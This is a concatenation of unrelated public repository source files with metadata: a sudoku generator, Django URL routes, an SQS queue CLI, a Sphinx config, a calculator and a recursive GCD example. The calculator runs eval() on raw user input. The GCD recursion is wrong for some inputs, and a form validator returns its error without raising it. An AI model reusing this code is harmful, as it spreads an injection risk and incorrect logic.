/.history/sudoku_20201029173225.py
f1d02d60237cac3cf3e062856f9ae2188ea2cd11
[]
no_license
JensVL96/Puzzle-solver-for-fun
4c15dcd570c3705b7ac555efb56b52913e81083c
6d8a4378a480372213a596a336a4deca727a00fc
refs/heads/master
2021-07-15T05:19:42.185495
2020-11-08T13:59:49
2020-11-08T13:59:49
224,855,888
1
0
null
null
null
null
UTF-8
Python
false
false
6,919
py
# -*- coding: utf-8 -*- from __future__ import print_function import pygame as pg from random import sample from pyglet.gl import * from string import * import numpy as np class create_board(): def __init__(self): self.base = 3 # Will generate any size of random sudoku board in O(n^2) time self.side = self.base * self.base self.nums = sample(range(1, self.side + 1), self.side) # random numbers self.board = [[self.nums[(self.base * (r%self.base) + r//self.base + c)%self.side] for c in range(self.side) ] for r in range(self.side)] rows = [ r for g in sample(range(self.base),self.base) for r in sample(range(g * self.base,(g + 1) * self.base), self.base) ] cols = [ c for g in sample(range(self.base),self.base) for c in sample(range(g * self.base,(g + 1) * self.base), self.base) ] self.board = [[self.board[r][c] for c in cols] for r in rows] # print("\nInput:") # for line in self.board: print(line) squares = self.side * self.side empties = squares * 3//4 for p in sample(range(squares),empties): self.board[p//self.side][p%self.side] = 0 self.lines() def expandLine(self, line): return line[0]+line[5:9].join([line[1:5]*(self.base-1)]*self.base)+line[9:13] def lines(self): self.line0 = self.expandLine("╔═══╤═══╦═══╗") self.line1 = self.expandLine("║ . │ . ║ . ║") self.line2 = self.expandLine("╟───┼───╫───╢") self.line3 = self.expandLine("╠═══╪═══╬═══╣") self.line4 = self.expandLine("╚═══╧═══╩═══╝") self.draw() def draw(self): symbol = " 1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ" self.nums = [ [""]+[symbol[n] for n in row] for row in self.board ] print(self.line0) for r in range(1,self.side+1): print( "".join(n+s for n,s in zip(self.nums[r-1],self.line1.split("."))) ) print([self.line2,self.line3,self.line4][(r%self.side==0)+(r%self.base==0)]) class solve_board(): def __init__(self, board): self.row = [] self.col = [] self.cell = [] self.row_list = [] self.col_list = [] self.cell_list = [] for space in range(9): self.col.append([]) self.cell.append([]) row_idx = 0 for line in board: self.row.append(line) cell_idx = 0 if row_idx >= 3: cell_idx = 3 if row_idx >= 6: cell_idx = 6 for col_idx in range(9): self.col[col_idx].insert(row_idx, line[col_idx]) if col_idx % 3 == 0: for triple in range(0, 3): self.cell[cell_idx].insert(len(self.cell[row_idx]) + triple, line[col_idx + triple]) cell_idx += 1 self.row_list.append(self.row) self.col_list.append(self.col) self.cell_list.append(self.cell) row_idx += 1 print("\nrow:") for row in self.row_list[0]: print(row) # print("\ncolumn:") # for col in self.col_list[0]: # print(col) # print("\ncell:") # for cell in self.cell_list[0]: # print(cell) def assign_flags(self, board): self.flags = [] row_idx = 0 cell_idx = 0 print("\n") for line in board: cell_idx = 0 if row_idx >= 3: cell_idx = 3 if row_idx >= 6: cell_idx = 6 for index in range(9): # print("position: ", index, "value: ", line[index]) # print("row", row_idx, "col", index, "cell", cell_idx) if (index % 3 == 0 and index != 0): cell_idx += 1 if line[index] == 0: flag_idx = 0 temp_flag = [] for value in range(1, 10): # print(value) if self.row_flag(value, row_idx): # print("found in row") pass elif self.col_flag(value, index): # print("found in column") pass elif self.cell_flag(value, cell_idx): # print("found in cell") pass else: temp_flag.append(value) flag_idx += 1 print(temp_flag) self.flags.append(temp_flag) row_idx += 1 def check_row(self): pass def column(self, x): pass def cell(self, row, col): pass def row_flag(self, index, row_idx): for row in self.row_list[0][row_idx]: # print("comparing in row ", row, "with ", index, "row_idx ", row_idx) if row == index: return 1 return 0 def col_flag(self, index, col_idx): for col in self.col_list[0][col_idx]: # print("comparing in column ", col, "with ", index, "col_idx ", col_idx) if col == index: return 1 return 0 def cell_flag(self, index, cell_idx): for cell in self.cell_list[0][cell_idx]: # print("comparing in cell ", cell, "with ", index, "cell_idx ", cell_idx) if cell == index: return 1 return 0 class Display_board(pyglet.window.Window): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # Set window size self.set_minimum_size(700,700) # Set background color background_color = [255, 255, 255, 255] background_color = [i / 255 for i in background_color] gClearColor(*background_color) def on_key_press(self, symbol, modifier): pass def on_key_release(self, symbol, modifier): pass def on_mouse_press(self, symbol, modifier): pass def on_draw(self, symbol, modifier): pass def update(self, symbol, modifier): pass # Start the main window and start a timer to hit the update method frame_rate = 30 class Main(): def __init__(self): self.board = [] self.run() def run(self): self.board = create_board().board self.solution = solve_board(self.board) self.solution.assign_flags(self.board) if __name__ == '__main__': window = Display_board(700, 700, "sudoku", resizeable=False) pyglet.clock.schedule_interval(window.update, 2/ frame_rate) pyglet.app.run() Main()
[ "jle040@uit.no" ]
jle040@uit.no
a5b8f8016a604a139731ae6089707b51448c5508
5d505823a5640ee6dce32183cac76dd48211702a
/apps/permissions/urls.py
76bb2af84e33894bade640b9a66170ca542cbfba
[]
no_license
strogo/mayan
0e1ead8c1b14d2f9d3f070373a57e2614579bc2a
cdff873400f9487ea8ed770d47df343a89835008
refs/heads/master
2020-04-06T06:53:24.301196
2011-03-12T09:06:25
2011-03-12T09:06:25
null
0
0
null
null
null
null
UTF-8
Python
false
false
829
py
from django.conf.urls.defaults import * urlpatterns = patterns('permissions.views', url(r'^role/list/$', 'role_list', (), 'role_list'), url(r'^role/create/$', 'role_create', (), 'role_create'), url(r'^role/(?P<role_id>\d+)/permissions/$', 'role_permissions', (), 'role_permissions'), url(r'^role/(?P<role_id>\d+)/edit/$', 'role_edit', (), 'role_edit'), url(r'^role/(?P<role_id>\d+)/delete/$', 'role_delete', (), 'role_delete'), url(r'^permission/(?P<permission_id>\d+)/for/(?P<app_label>[\w\-]+)/(?P<module_name>[\w\-]+)/(?P<pk>\d+)/grant/$', 'permission_grant_revoke', {'action':'grant'}, 'permission_grant'), url(r'^permission/(?P<permission_id>\d+)/for/(?P<app_label>[\w\-]+)/(?P<module_name>[\w\-]+)/(?P<pk>\d+)/revoke/$', 'permission_grant_revoke', {'action':'revoke'}, 'permission_revoke'), )
[ "Roberto.Rosario.Gonzalez@gmail.com" ]
Roberto.Rosario.Gonzalez@gmail.com
85bbae3ed6f3bfb50670f9375b6cb5cb8b856f19
cf5ceed90310006a4543d976882c85bc701efab3
/crawley/manager/commands/__init__.py
895d50c9e43e6ddd6cb692746b327145556a5241
[]
no_license
hammadk373/crawley
698b1aff51267a78f5e9f18d78f43e1dd69d75bd
f7522cfa0446b523b93e8056991f9d10e9754ff0
refs/heads/master
2021-01-18T06:52:07.753729
2011-10-28T02:37:00
2011-10-28T02:37:00
2,663,083
1
0
null
null
null
null
UTF-8
Python
false
false
774
py
""" All Crawley's commands must be here """ from crawley.manager.utils import exit_with_error from run import RunCommand from shell import ShellCommand from startproject import StartProjectCommand from syncdb import SyncDbCommand from browser import BrowserCommand class CommandsDict(dict): def __getitem__(self, key): if key in self: return dict.__getitem__(self, key) else: exit_with_error("[%s] Subcommand not valid" % (key)) commands = CommandsDict() d = { RunCommand.name : RunCommand, ShellCommand.name : ShellCommand, StartProjectCommand.name : StartProjectCommand, SyncDbCommand.name : SyncDbCommand, BrowserCommand.name : BrowserCommand, } commands.update(d)
[ "jmg.utn@gmail.com" ]
jmg.utn@gmail.com
e75a8b7eb62b91249a6c1ed047fdc38e0466edde
800a14e246e19308445eaec2456282361819a763
/05-Functions.py
a698f3fec295f43f0c439d19719166dbfc3152b7
[]
no_license
anmolrajaroraa/CorePythonMarch
76d6ae5ace773e3406ae637e715240dbef09cfe1
0f693270bdd5f21e1401d0515574945a6004fecd
refs/heads/master
2021-03-15T02:29:52.818197
2020-04-26T10:06:23
2020-04-26T10:06:23
246,817,221
0
1
null
null
null
null
UTF-8
Python
false
false
464
py
def takeInput(): first_num = input("Enter first number : ") second_num = input("Enter second number : ") return first_num, second_num def calculate(operator): x, y = takeInput() # print(xoperatory) print(eval(x + operator + y)) print(''' 1. Add 2. Subtract 3. Multiply 4. Divide ''') choice = int(input("Enter your choice : ")) operators = { 1: "+", 2: "-", 3: "*", 4: "/" } calculate(operators[choice])
[ "anmolarora1711@gmail.com" ]
anmolarora1711@gmail.com
87f99d6fbc4b1f65292544a6604083619ffac402
8f8e378c0ce4224244582c506c268edda3cc3b30
/Common/ML/Day11/k.py
7cd68c168a9b23db33a99fb633074bc7b9ee6f5f
[]
no_license
srsapireddy/Diploma-in-AI_NIELIT_Files
223318319b2d4b8647d77b99d1ba03f0d6e15cf6
9e2ed78fbe03369ebef1aa81f3417fc21bdd4107
refs/heads/master
2021-05-17T14:28:00.059617
2020-03-29T09:28:04
2020-03-29T09:28:04
250,820,401
0
0
null
null
null
null
UTF-8
Python
false
false
338
py
from sklearn.datasets import load_iris from sklearn.neighbors import KNeighborsClassifier iris=load_iris() import pickle X=iris.data y=iris.target knn=KNeighborsClassifier() knn1=KNeighborsClassifier() knn.fit(X,y) file='k1' pickle.dump(knn,open(file,'wb')) knn1=pickle.load(open(file,'rb')) p=knn1.predict([[3,2,2,1]]) print(p)
[ "sapireddyrahul@gmail.com" ]
sapireddyrahul@gmail.com
f393981cecf624006b404116a11be34f4cd139cf
51108a50ffb48ad154f587c230045bb783f22240
/bflib/units/__init__.py
036f8f8be95c9ed68fe6f955023f6bcf26da6861
[ "MIT" ]
permissive
ChrisLR/BasicDungeonRL
c90bd0866c457557cccbad24e14689d5d6db7b00
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
refs/heads/master
2021-06-15T13:56:53.888646
2019-08-05T16:33:57
2019-08-05T16:33:57
104,269,987
3
0
MIT
2019-08-05T16:28:23
2017-09-20T21:35:19
Python
UTF-8
Python
false
false
247
py
from bflib.units.distance import Feet from bflib.units.mass import Pound from bflib.units.speed import FeetPerGameTurn from bflib.units.time import CombatRound, GameTurn, Minute, Second, Year, Hour from bflib.units.volume import CubicFeet, Litre
[ "arzhul@gmail.com" ]
arzhul@gmail.com
c319f7eb6adadc8d4b605cc1e85628addfd71945
71dc727f9056934cd51692f8a3d26cf0dda44ef0
/code/Chapter-12/gcd.py
d6cb90c851bef0ce5b925ec84a6df6e159789188
[ "MIT" ]
permissive
justinclark-dev/CSC110
9d255020a50bbfdb195465c3e742dd2fcd61e3a4
d738ec33b757ba8fa9cf35b2214c184d532367a0
refs/heads/master
2022-12-08T08:08:30.667241
2020-09-04T01:05:34
2020-09-04T01:05:34
232,606,910
0
1
MIT
2020-09-04T02:05:47
2020-01-08T16:28:37
Python
UTF-8
Python
false
false
512
py
# This program uses recursion to find the GCD # of two numbers. def main(): # Get two numbers. num1 = int(input('Enter an integer: ')) num2 = int(input('Enter another integer: ')) # Display the GCD. print('The greatest common divisor of') print('the two numbers is', gcd(num1, num2)) # The gcd function returns the greatest common # divisor of two numbers. def gcd(x, y): if x % y == 0: return y else: return gcd(x, x % y) # Call the main function. main()
[ "justinclark.dev@gmail.com" ]
justinclark.dev@gmail.com
fb78d2f8093b498f88e87fba3b9afa1bad9ba6e7
aad51b0ea59c38b23ed419e10b86c44aa947f117
/288/smallest.py
7003266b991249449227815267c7b365aaac4b8f
[]
no_license
berubejd/PyBites
3a1d7144f59f67a0996dbe224b69bc0b6da439d6
439446e8b67612a603713723b2d4a021677341d2
refs/heads/master
2021-07-14T14:03:51.819347
2020-11-01T14:59:02
2020-11-01T14:59:02
221,087,519
0
0
null
null
null
null
UTF-8
Python
false
false
522
py
#!/usr/bin/env python3.8 """ Bite 288. Smallest number ☆ Write a function that accepts a list of digits and returns the smallest number that can be created by combining unique digits. Therefore, you have to ignore duplicated digits. Examples: [1] => 1 [7, 1] => 17 [1, 9, 5, 9, 1] => 159 Note: An empty input list [] should return 0. """ from typing import List def minimum_number(digits: List[int]) -> int: if not digits: return 0 return int("".join(str(s) for s in sorted(set(digits))))
[ "berubejd@gmail.com" ]
berubejd@gmail.com
210332a8e477a11cd9d18fa27771e44c7d8b322b
3fd8fd35d61d997b586e40ed8d938805ce5fdf3b
/unique_ingredients_generator.py
cf09203c8b44b54f8131bbe5e3d2071ef90ee998
[]
no_license
ChocolatePadmanaban/Cooking_Scheduler
8afd967cd5128b15c9865aa44ae3d298ee3027ad
3cd91009e68064f92408fb5bba55519ba77767c3
refs/heads/master
2023-01-03T10:55:25.306425
2020-11-01T07:13:50
2020-11-01T07:13:50
260,551,843
0
0
null
null
null
null
UTF-8
Python
false
false
849
py
import csv import os ingredient_files=os.listdir("recipe_ingredients") ingredient_dict={} for ingredient_file in ingredient_files: i_file = open('recipe_ingredients/'+ingredient_file) csv_i_file = csv.reader(i_file) for row in csv_i_file: if row[0] not in ['name', 'question']: if row[0] in ingredient_dict.keys() and row[2] != ingredient_dict[row[0]]: if type(ingredient_dict[row[0]]) == type([]): ingredient_dict[row[0]].append(row[2]) else: ingredient_dict[row[0]]=[ingredient_dict[row[0]],row[2]] else: ingredient_dict[row[0]]=row[2] i_file.close() row_format ="{:<20}" *2 for key in sorted(ingredient_dict): #print( row_format.format(key, ingredient_dict[key])) print( key, ingredient_dict[key])
[ "pradeeppadmanaban7@gmail.com" ]
pradeeppadmanaban7@gmail.com
877564edfc0d7dbde701ac67bc6a543797ef45e0
409ea8d82e5cc160028456755f9b36fd74da6258
/AI 서비스를 위한 프로그래밍 기본/test0720.py
da63291344c0bbd1f90e4385dbdb3f7b83c74619
[]
no_license
ineed-coffee/multicampus-AI-engineering
55c241c8367d099a62595032f4496f10662446f1
5dd9f6dd97910de73103235b33a5d500c205237a
refs/heads/master
2023-01-19T21:37:59.192972
2020-11-30T09:54:49
2020-11-30T09:54:49
279,185,082
1
0
null
null
null
null
UTF-8
Python
false
false
654
py
# # review # # private instance variable # class person(): # def __init__(self,name,age): # self.__name = name # self.__age = age # def show_name(self): # return self.__name # def show_age(self): # return self.__age # # inheritance # class student(): # def study(self): # print('Student studying') # class mid_student(): # def study(self): # print('Middle student studying') # #-------------------------------------------------------- # from mypackage import functions # Command = functions.sum # print(Command(1,2)) import os print(os.path.exists('user.txt'))
[ "leey93ssu@gmail.com" ]
leey93ssu@gmail.com
220baaf2058130c0aee5967ca7d27910c3f5723e
b5f249c6ede64809cce1c622d1da536de7a88ce8
/test/unit/constants.py
a7b9246c0ba63cc2d6a6abf6fe58a3b5cae50c09
[]
no_license
rimms/jubatest
89a554d2361ef3095f920a92c5d89fe2fdb646e5
e4d66ceccfdeecdb91ba3d216c227773b70a7fe1
refs/heads/master
2020-12-25T09:47:16.812398
2015-03-12T10:47:31
2015-03-12T10:47:31
13,459,176
0
0
null
null
null
null
UTF-8
Python
false
false
806
py
# -*- coding: utf-8 -*- import time from jubatest import * from jubatest.unit import JubaTestFixtureFailedError class DefaultConfigTest(JubaTestCase): def test_sleep(self): begin = time.time() sleep(1) # from jubatest.constants timeTaken = time.time() - begin self.assertAlmostEqual(1.0, timeTaken, places=2) def test_default_config_classifier_immutable(self): cfg1 = default_config(CLASSIFIER) cfg1['method'] = 'none' cfg2 = default_config(CLASSIFIER) self.assertNotEqual(cfg1['method'], cfg2['method']) def test_default_config_recommender(self): self.assertIsNotNone(default_config(RECOMMENDER)) def test_default_config_fail(self): self.assertRaises(JubaTestFixtureFailedError, default_config, 'fail')
[ "webmaster@kenichimaehashi.com" ]
webmaster@kenichimaehashi.com
6b37f3ed770bca9d9f491eb1028f94922a775476
c7ce0a7bbefa817877ae02d0497a8ee138ee460d
/app/migrations/0002_work.py
f3c5c9bfad5d20168b49d0605cfad93cfb4c907b
[]
no_license
hiroshi-higashiyama/DJANGO-PORTFOLIO
288cfcb0eefc375b643556d0ab63e05acc0646c6
1e66ed9355fc00cd8228b3bcac40a8f6c75b6451
refs/heads/master
2022-12-03T20:24:39.109925
2020-08-21T13:26:44
2020-08-21T13:26:44
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,087
py
# Generated by Django 3.1 on 2020-08-16 10:02 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app', '0001_initial'), ] operations = [ migrations.CreateModel( name='Work', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=100, verbose_name='タイトル')), ('image', models.ImageField(upload_to='images', verbose_name='イメージ画像')), ('thumbnail', models.ImageField(blank=True, null=True, upload_to='images', verbose_name='サムネイル')), ('skill', models.CharField(max_length=100, verbose_name='スキル')), ('url', models.CharField(blank=True, max_length=100, null=True, verbose_name='URL')), ('created', models.DateField(verbose_name='作成日')), ('description', models.TextField(verbose_name='説明')), ], ), ]
[ "s20840011@gmail.com" ]
s20840011@gmail.com
85e2f1127c455858f263e129968012d3d12350e4
bc6508a1dde1e61a8b2f61e70044c074aeeb4406
/whoiser/servers/UA.py
c9752e72fe6d9a86e91af5187e8fc2b9203b5cd5
[]
no_license
krikulis/whoiser
7eca72260dc061a91c7630901557264b80c5263e
27af46d6ffcf2bacc5e5b837883ab5fab7ac9b40
refs/heads/master
2021-01-10T19:10:53.915622
2012-06-24T23:50:28
2012-06-24T23:50:28
null
0
0
null
null
null
null
UTF-8
Python
false
false
200
py
#TODO: write implementation from servers.generic import GenericWhoisQuery class WhoisQuery(GenericWhoisQuery): server = 'whois.ua' def parse_response(self, response): return response
[ "kristaps.kulis@gmail.com" ]
kristaps.kulis@gmail.com
8f1b383ecc9e8d14ee9afc1d8a5cf57fe674970f
d1da1bfc310cb428152a9d4e41509b08ee4a6846
/python4.py
bf6430f3830af7492994d5b1cbf235ff9b2d8815
[]
no_license
imrajashish/python
3c9c3a2b3cdd939741fc062ca52df6e3a40d5a45
898032f9acb707e0cb0ad40b6b6f2a2406610893
refs/heads/master
2022-12-07T12:07:08.500570
2020-09-04T15:21:26
2020-09-04T15:21:26
283,292,211
1
0
null
null
null
null
UTF-8
Python
false
false
1,867
py
#Write a Python program to solve (x + y) * (x + y). x = 4 y = 5 s = (x + y) * (x + y) print("output is : ",s) #Write a Python program to add two objects if both objects are an integer type. x = int(input("Enter the a : ")) y = int(input("Enter the b : ")) sum = x+y print("sum of two number is : ",sum) # Write a Python program to display your details like name, age, address in three different lines def personal_details(): name , age = "Ashish",21 address = "Bangalore, Karnataka, India" print("Name: {}\nAge: {}\nAddress: {}".format(name, age, address)) personal_details() #Write a Python program to compute the future value of a specified principal amount, rate of interest, and a number of years. amt = 10000 int = 3.5 years = 7 future_value = amt*((1+(0.01*int)) ** years) print(round(future_value,2)) #remark #Write a Python program to compute the distance between the points (x1, y1) and (x2, y2). x1 = float(input("Enter the number x1 is :")) x2 = float(input("Enter the number x2 is :")) y1 = float(input("Enter the number y1 is :")) y2 = float(input("Enter the number y2 is :")) distance = (x1-x2)*(y1-y2) print("distance between the points is : ",distance) #Write a Python program to sum of two given integers. However, if the sum is between 15 to 20 it will return 20. def sum(x,y): sum = x+y if sum in range(15,20): return 20 else: return sum print(sum(10,6)) #Write a Python program that will return true if the two given integer values are equal or their sum or difference is 5 def sum(x,y): if x == y or abs(x+y) == 5 or x-y == 5: return True #remark else: return False print(sum(7,2)) print(sum(3, 2)) print(sum(2, 2)) #Write a Python program to check whether a file exists. import os.path open('abc.txt', 'w') print(os.path.isfile('abc.txt')) #remark w
[ "imrajashish07@gmail.com" ]
imrajashish07@gmail.com
1620054aa845a8b00ec4d9c3c6f27667467d29a6
d9a5600b3b211993dedd4225dfd77ff7daa1384e
/src/tweets/admin.py
d958f478fa09fdd00c0e0eb02be9ccd5aae9bbd1
[]
no_license
Ahmedsebit/django_twitter_like_app
220da09fd471c1e5a28070f9af587b3d23aafe78
d1abb08da75928a97761830faaca2fd32fbe3e31
refs/heads/master
2020-12-02T23:57:26.744081
2017-07-12T12:16:38
2017-07-12T12:16:38
95,966,074
0
0
null
null
null
null
UTF-8
Python
false
false
276
py
from django.contrib import admin # Register your models here. from .forms import TweetModelForm from .models import Tweet class TweetModelAdmin(admin.ModelAdmin): # form = TweetModelForm class Meta: model = Tweet admin.site.register(Tweet, TweetModelAdmin)
[ "Ahmed.yusuf@andela.com" ]
Ahmed.yusuf@andela.com
242fcb76e5732df2b210443389ce6cf555f2bfd3
57cb9fef5efac78758f5d151b959ca2216c94083
/edx/app/discovery/venvs/discovery/bin/cq
11d127b143483c4edd18ed18708a09cbf20e1286
[]
no_license
JosiahKennedy/openedx-branded
9751d5362088276a87b2e0edca0913568eeb1ac4
d16a25b035b2e810b8ab2b0a2ac032b216562e26
refs/heads/master
2022-12-21T02:39:17.133147
2020-03-25T06:03:23
2020-03-25T06:03:23
249,895,218
0
1
null
2022-12-08T01:23:48
2020-03-25T05:33:05
null
UTF-8
Python
false
false
3,081
#!/edx/app/discovery/venvs/discovery/bin/python3 # Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/ # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. # import getopt, sys import boto.sqs from boto.sqs.connection import SQSConnection from boto.exception import SQSError def usage(): print 'cq [-c] [-q queue_name] [-o output_file] [-t timeout] [-r region]' def main(): try: opts, args = getopt.getopt(sys.argv[1:], 'hcq:o:t:r:', ['help', 'clear', 'queue=', 'output=', 'timeout=', 'region=']) except: usage() sys.exit(2) queue_name = '' output_file = '' timeout = 30 region = '' clear = False for o, a in opts: if o in ('-h', '--help'): usage() sys.exit() if o in ('-q', '--queue'): queue_name = a if o in ('-o', '--output'): output_file = a if o in ('-c', '--clear'): clear = True if o in ('-t', '--timeout'): timeout = int(a) if o in ('-r', '--region'): region = a if region: c = boto.sqs.connect_to_region(region) if c is None: print 'Invalid region (%s)' % region sys.exit(1) else: c = SQSConnection() if queue_name: try: rs = [c.create_queue(queue_name)] except SQSError as e: print 'An Error Occurred:' print '%s: %s' % (e.status, e.reason) print e.body sys.exit() else: try: rs = c.get_all_queues() except SQSError as e: print 'An Error Occurred:' print '%s: %s' % (e.status, e.reason) print e.body sys.exit() for q in rs: if clear: n = q.clear() print 'clearing %d messages from %s' % (n, q.id) elif output_file: q.dump(output_file) else: print q.id, q.count(vtimeout=timeout) if __name__ == "__main__": main()
[ "josiahk@phyziklabs.com" ]
josiahk@phyziklabs.com
67847d07a9ae4df961e7ab84e973abb383ecefb0
58d6c7927d58ba9782c79624dadd9602c8148daa
/docs/conf.py
bc7bb2ead825b9c212910f5165c69fbd9b43d494
[ "CC-BY-3.0" ]
permissive
benzheren/deform
413c57da9a5e43d6b228c661756e19ff6461cbba
79d8ac16743815f0c24c27c2ca7ea4287dc5ffb4
refs/heads/master
2021-01-15T20:23:55.318165
2011-05-20T03:06:33
2011-05-20T03:06:33
1,549,685
1
0
null
null
null
null
UTF-8
Python
false
false
6,116
py
# -*- coding: utf-8 -*- # # deform documentation build configuration file # # This file is execfile()d with the current directory set to its containing # dir. # # The contents of this file are pickled, so don't put values in the # namespace that aren't pickleable (module imports are okay, they're # removed automatically). # # All configuration values have a default value; values that are commented # out serve to show the default value. import sys, os # If your extensions are in another directory, add it here. If the # directory is relative to the documentation root, use os.path.abspath to # make it absolute, like shown here. #sys.path.append(os.path.abspath('some/directory')) parent = os.path.dirname(os.path.dirname(__file__)) sys.path.append(os.path.abspath(parent)) wd = os.getcwd() os.chdir(parent) os.system('%s setup.py test -q' % sys.executable) os.chdir(wd) for item in os.listdir(parent): if item.endswith('.egg'): sys.path.append(os.path.join(parent, item)) # General configuration # --------------------- # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = ['sphinx.ext.autodoc'] # Add any paths that contain templates here, relative to this directory. templates_path = ['.templates'] # The suffix of source filenames. source_suffix = '.rst' # The master toctree document. master_doc = 'index' # General substitutions. project = 'deform' copyright = '2011, Agendaless Consulting <pylons-discuss@googlegroups.com>' # The default replacements for |version| and |release|, also used in various # other places throughout the built documents. # # The short X.Y version. version = '0.9' # The full version, including alpha/beta/rc tags. release = version # There are two options for replacing |today|: either, you set today to # some non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. today_fmt = '%B %d, %Y' # List of documents that shouldn't be included in the build. #unused_docs = [] # List of directories, relative to source directories, that shouldn't be # searched for source files. #exclude_dirs = [] # The reST default role (used for this markup: `text`) to use for all # documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # Options for HTML output # ----------------------- sys.path.append(os.path.abspath('_themes')) html_theme_path = ['_themes'] html_theme = 'pylons' # The style sheet to use for HTML and HTML Help pages. A file of that name # must exist either in Sphinx' static/ path, or in one of the custom paths # given in html_static_path. #html_style = 'pylons.css' # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as # html_title. #html_short_title = None # The name of an image file (within the static path) to place at the top of # the sidebar. #html_logo = '.static/logo_hi.gif' # The name of an image file (within the static path) to use as favicon of # the docs. This file should be a Windows icon file (.ico) being 16x16 or # 32x32 pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) # here, relative to this directory. They are copied after the builtin # static files, so a file named "default.css" will overwrite the builtin # "default.css". #html_static_path = ['.static'] # If not '', a 'Last updated on:' timestamp is inserted at every page # bottom, using the given strftime format. html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_use_modindex = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, the reST sources are included in the HTML build as # _sources/<name>. #html_copy_source = True # If true, an OpenSearch description file will be output, and all pages # will contain a <link> tag referring to it. The value of this option must # be the base URL from which the finished HTML is served. #html_use_opensearch = '' # If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = '' # Output file base name for HTML help builder. htmlhelp_basename = 'deformdoc' # Options for LaTeX output # ------------------------ # The paper size ('letter' or 'a4'). #latex_paper_size = 'letter' # The font size ('10pt', '11pt' or '12pt'). #latex_font_size = '10pt' # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, document class [howto/manual]). latex_documents = [ ('index', 'deform.tex', 'deform Documentation', 'Pylons Developers', 'manual'), ] # The name of an image file (relative to this directory) to place at the # top of the title page. latex_logo = '.static/logo_hi.gif' # For "manual" documents, if this is true, then toplevel headings are # parts, not chapters. #latex_use_parts = False # Additional stuff for the LaTeX preamble. #latex_preamble = '' # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_use_modindex = True
[ "chrism@plope.com" ]
chrism@plope.com
425d0243808928a0a7b2acc6b6c87210f7a7790a
81a72409096ad1dd5c443ebcbe6309cb8e6050d7
/389.py
bf147eda1da9f8220859494370cda76aaf116a57
[]
no_license
plee0117/LC
57a06a18316680d202e417c7fbba2c90139908f3
75fe9ce131699854a468b829508d0636e4a820c4
refs/heads/master
2021-05-18T22:08:36.600206
2020-08-21T14:47:19
2020-08-21T14:47:19
251,446,370
0
0
null
null
null
null
UTF-8
Python
false
false
221
py
class Solution: def findTheDifference(self, s: str, t: str) -> str: ind = list(range(len(t))) for i in s: ind[t.index(i)] = 0 t = t.replace(i, '0', 1) return t[sum(ind)]
[ "emailme.paul@gmail.com" ]
emailme.paul@gmail.com
5833cd7532aeb6518a79c95a2078387fb6f85c44
701086eb3c858cf7e677f4e901b37ca26752b494
/app/forms/validators.py
c76bb90bf7fee5ddd0a67d6cc97ef807167875df
[]
no_license
anshulkgupta/eventum
e38f19678358b42f0336c642d818e8e8ed14c84b
4b36ed879694b650c1e5a1eefea7c36855ccf221
refs/heads/master
2021-01-18T01:24:52.697223
2014-10-26T23:09:11
2014-10-26T23:09:11
null
0
0
null
null
null
null
UTF-8
Python
false
false
276
py
from app.models import Image from wtforms.validators import ValidationError def image_with_same_name(form,field): if Image.objects(filename=field.data).count() != 1: return ValidationError( message="Can't find image `%s` in the database" % field.data)
[ "dan.r.schlosser@gmail.com" ]
dan.r.schlosser@gmail.com
335af7220f389eddf0baa1cf0cb97e3f9ba72f03
52b5773617a1b972a905de4d692540d26ff74926
/.history/valid_20200616212636.py
96b5562d02e05c82fb1fac891633e27e6b568d99
[]
no_license
MaryanneNjeri/pythonModules
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
f4e56b1e4dda2349267af634a46f6b9df6686020
refs/heads/master
2022-12-16T02:59:19.896129
2020-09-11T12:05:22
2020-09-11T12:05:22
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,064
py
